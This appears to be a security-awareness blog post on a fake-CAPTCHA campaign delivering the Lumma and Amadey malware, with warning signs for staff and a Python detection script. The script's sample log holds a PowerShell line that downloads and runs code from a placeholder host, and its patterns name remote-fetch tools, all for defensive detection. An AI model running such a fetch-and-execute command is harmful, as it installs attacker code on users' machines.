Don't Get CAPTURED By Fake CAPTCHA

An insidious malware campaign uses fake CAPTCHA tests to distribute malware. The attackers exploit web users' instincts to quickly click through verification tools. This campaign primarily targets users through online ads, adult sites, file-sharing services, betting platforms, anime websites, and web apps that monetize traffic.

The malware involved in this campaign includes Lumma and Amadey.

Lumma is an infostealer that has been available through a malware-as-a-service model on Russian-speaking forums since at least August 2022. Once installed on a victim's device, Lumma searches for files associated with cryptocurrency wallets and steals them. It also attempts to extract cookies and other credentials stored in browsers, including data from password manager archives.

Lumma Stealer provides cybercriminals with several advanced functionalities, making it an effective tool for information theft and further exploitation.

Key features include data exfiltration, automatic updates, data logging, and loader capability. It extracts sensitive data from browsers, cryptocurrency wallets, and applications, focusing on credentials, financial info, and personal data. The malware receives regular updates from its Command-and-Control (C2) servers to enhance evasion techniques and introduce new capabilities. It compiles logs from infected systems, including browser data and clipboard content, for further exploitation.

Additionally, Lumma Stealer acts as a loader, enabling the drop of additional malware, expanding the attack vector to include ransomware or trojans.

Amadey is a botnet that first appeared around 2018 and is currently being sold for about $500 on Russian-speaking hacking forums. Amadey downloads several modules to steal credentials from popular browsers, detects cryptocurrency wallet addresses in the clipboard, and substitutes them with addresses controlled by the attackers. One module can also take screenshots and, in some cases, download the Remcos remote access tool to the victim's device, giving the attackers full control.

One of the ironic elements of this social engineering campaign is that CAPTCHA was meant to stop bots, and Amadey is a botnet.

https://therecord.media/fake-captcha-malware-campaign-lumma-amadey and https://cybersecuritynews.com/lumma-stealer/#google_vignette

Commentary

The use of fake CAPTCHA is extremely alarming because few would suspect that a test meant to stop malware-ridden spam, one that users complete almost without thinking, could deliver two very harmful forms of malware.

CAPTCHA, which stands for "Completely Automated Public Turing test to tell Computers and Humans Apart," is a type of challenge-response test used in computing to determine whether the user is human. The primary purpose of CAPTCHA is to prevent spam and abuse on websites by distinguishing between human users and automated bots.

CAPTCHAs are designed to be easy for humans to solve but difficult for bots. They often involve tasks such as identifying distorted text, selecting images that match a certain criterion, or solving simple puzzles. By requiring users to complete these tasks, CAPTCHAs help protect websites from automated attacks, such as promotion spam, registration spam, and data scraping.

Prevention starts with educating your workforce, specifically on the warning signs of fake-CAPTCHA malware:

  • Legitimate CAPTCHAs are typically found on trusted, well-known sites. A CAPTCHA on a shady site, like a porn site, is suspicious. Employees should not visit sites where malware is commonly spread, such as porn and gambling sites, on work devices.
  • Real CAPTCHAs don't ask for sensitive data like your name, email, or password. If a CAPTCHA prompt requests such information, it is likely malicious.
  • If completing the CAPTCHA redirects you to a suspicious site or triggers odd pop-ups, there's a good chance the CAPTCHA was fake.
  • Fake CAPTCHAs may hijack your clipboard by copying malicious code to it. If you notice unusual clipboard activity after interacting with a CAPTCHA, it could be a sign of malware.
  • Legitimate CAPTCHAs typically require simple tasks like selecting images or typing text. If a CAPTCHA asks you to perform additional steps, such as running commands or downloading files, it is likely malicious.
  • While HTTPS is generally a sign of security, attackers may use it to create a convincing illusion of legitimacy. Be cautious if a CAPTCHA page uses HTTPS but seems suspicious.
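As an added example (not code from the original article or its sources), here is a small detection check in the spirit of the last two warning signs: it scans constructed process-creation log lines and flags command interpreters launched directly from the desktop shell whose command line fetches remote content, hides its window, or carries encoded arguments, the kind of "run this command" step a real CAPTCHA never asks for. The log format, the interpreter list and the patterns are assumptions of this example, not a vendor's rule.

```python
import re
from dataclasses import dataclass

# Interpreters an end user rarely launches by hand from the desktop shell (assumed list).
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that, combined with an interactive launch, suggest a pasted
# "verification" command: remote fetch, hidden window, or encoded arguments (assumed patterns).
SUSPECT_ARGS = [
    re.compile(r"https?://", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|certutil)\b", re.I),
]

@dataclass
class ProcEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str  # full command line

def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'parent=... image=... cmd=...' log line."""
    m = re.match(r"parent=(\S+)\s+image=(\S+)\s+cmd=(.*)", line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    return ProcEvent(*m.groups())

def is_fake_captcha_pattern(ev: ProcEvent) -> bool:
    """True when a script host is started directly from the desktop shell with suspect arguments."""
    if ev.parent.lower() != "explorer.exe" or ev.image.lower() not in USER_SHELLS:
        return False
    return any(p.search(ev.cmdline) for p in SUSPECT_ARGS)

def flag_events(lines) -> list:
    return [ev for ev in map(parse_event, lines) if is_fake_captcha_pattern(ev)]

# Constructed sample log: two hits, three benign launches that share some traits but not all.
SAMPLE_LOG = [
    'parent=explorer.exe image=powershell.exe cmd=powershell -w hidden -c "iwr http://example.invalid/v | iex"',
    'parent=explorer.exe image=cmd.exe cmd=cmd /c dir C:\\Users',
    'parent=code.exe image=powershell.exe cmd=powershell -c "iwr http://example.invalid/api"',
    'parent=explorer.exe image=notepad.exe cmd=notepad https://example.invalid/readme.txt',
    'parent=explorer.exe image=mshta.exe cmd=mshta https://example.invalid/captcha',
]

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_LOG):
        print(f"ALERT: {ev.image} launched from {ev.parent}: {ev.cmdline}")
```

The parent-process condition is what keeps this from firing on every script a developer or admin runs from a terminal or IDE; tune the interpreter list and patterns to your environment's telemetry.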

The final takeaway: if your workforce is aware of these indicators, your organization is better protected from fake-CAPTCHA malware.

Sources: https://support.google.com/recaptcha/?hl=en and https://en.wikipedia.org/wiki/CAPTCHA and https://www.tomsguide.com/computing/online-security/hackers-are-using-recaptcha-to-trick-users-into-infecting-their-own-pcs-with-malware-how-to-stay-safe and https://cybersecuritynews.com/beware-of-fake-captcha-prompts-that-may-install-lummastealer/#google_vignette